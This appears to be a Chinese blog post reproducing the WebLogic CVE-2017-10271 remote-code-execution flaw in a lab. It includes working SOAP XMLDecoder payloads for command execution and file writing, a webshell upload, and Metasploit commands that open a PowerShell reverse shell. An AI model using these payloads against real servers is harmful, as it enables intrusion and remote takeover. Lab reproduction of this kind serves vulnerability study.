美文网首页
WebLogic中WLS组件漏洞 CVE-2017-10271

WebLogic中WLS组件漏洞 CVE-2017-10271

作者: CSeroad | 来源:发表于2018-09-24 11:13 被阅读415次

    漏洞描述

    WebLogic WLS组件中存在远程代码执行漏洞,可以构造请求对运行WebLogic中间件的主机进行攻击,

    漏洞范围

    受影响的WebLogic的版本:

    10.3.6.0.0,

    12.1.3.0.0,

    12.2.1.1.0,

    12.2.1.2.0

    漏洞复现

    环境的搭建

    weblogic 12.2.1.3.0、java 1.8.0

    下载weblogic 12.2.1.3.0 地址:

    http://download.oracle.com/otn/nt/middleware/12c/12213/fmw_12.2.1.3.0_wls_quick_Disk1_1of1.zip

    切换到jdk1.8.0的bin目录下进行安装

    java weblogic安装

    不太懂weblogic,选择默认安装吧

    安装中

    开始域配置。。

    密码

    看到密码有要求

    生产

    这个选择生产环境

    安装成功后。。切换C:\Oracle\Middleware\Oracle_Home\user_projects\domains\base_domain

    start

    点击startWebLogic进行启动

    输入

    输入登录用户名密码

    端口开放

    进行访问

    ok

    漏洞页面

    wls-wsat

    命令执行

    使用burp进行抓包改包

    输入post 请求的payload

    <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">    <soapenv:Header>        <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">            <java version="1.6.0" class="java.beans.XMLDecoder">                <object class="java.lang.ProcessBuilder">                    <array class="java.lang.String" length="1">                      <void index="0">                        <string>calc</string>                    </void>                    </array>                <void method="start"/>                </object>            </java>        </work:WorkContext>    </soapenv:Header>    <soapenv:Body/> </soapenv:Envelope>

    并且修改请求方式为post,Upgrade-Insecure-Requests: 1,Content-Type: text/xml

    ok

    calc命令执行

    success

    使用大神写的exp进行测试

    ok

    文件上传

    当使用burp进行改包文件上传时,

    在weblogic服务上生成p.txt文件,达到文件上传的结果。

    ok

    POST数据包的payload:

    <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">    <soapenv:Header>        <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">            <java>                <java version="1.6.0" class="java.beans.XMLDecoder">                    <object class="java.io.PrintWriter">                        <string>servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/p.txt</string><void method="println">                        <string>hello  weblogic </string></void><void method="close"/>                    </object>                </java>            </java>        </work:WorkContext>    </soapenv:Header>    <soapenv:Body/></soapenv:Envelope>

    success

    但是在尝试创建jsp小马文件的时候,出现了错误。

    注:应该是编码的问题。

    ok

    使用exp进行测试

    小马

    上传小马,菜刀连接

    error

    注:也是出现了java的错误。。

    没有办法,只能一个上传命令执行的马。

    ok success

    metasploit

    在metasploit中也有攻击模块

    search  CVE-2017-10271

    use exploit/multi/http/oracle_weblogic_wsat_deserialization_rce

    set payload cmd/windows/powershell_reverse_tcp

    set  RHOST      192.168.72.138

    run

    options

    配置好后可攻击。

    session

    总结:有几个bug还需要好好琢磨。。先记下来吧

    参考资料

    https://www.jianshu.com/p/a30c0e4733e4

    https://github.com/hanc00l/weblogic_wls_wsat_rce

    相关文章

      网友评论

          本文标题:WebLogic中WLS组件漏洞 CVE-2017-10271

          本文链接:https://www.haomeiwen.com/subject/mfpcoftx.html